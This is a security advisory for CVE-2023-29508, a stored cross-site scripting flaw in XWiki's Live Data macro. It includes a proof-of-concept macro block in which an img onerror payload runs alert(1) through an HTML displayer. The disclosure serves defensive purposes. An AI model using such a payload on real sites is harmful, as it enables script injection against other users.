CVE-2023-29508: org.xwiki.platform:xwiki-platform-livedata-macro vulnerable to Basic Cross-site Scripting

April 12, 2023 (updated February 6, 2025)

A user without script rights can introduce a stored XSS by using the Live Data macro, if the last author of the content of the page has script rights.

For instance, by adding the LiveData below in the about section of the profile of a user created by an admin.

{{liveData id="movies" properties="title,description"}}
{
"data": {
"count": 1,
"entries": [
{
"title": "Meet John Doe",
"url": "https://www.imdb.com/title/tt0033891/",
"description": "<img onerror='alert(1)' src='foo' />"
}
]
},
"meta": {
"propertyDescriptors": [
{
"id": "title",
"name": "Title",
"visible": true,
"displayer": {"id": "link", "propertyHref": "url"}
},
{
"id": "description",
"name": "Description",
"visible": true,
"displayer": "html"
}
]
}
}
{{/liveData}}

References

Detect and mitigate CVE-2023-29508 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →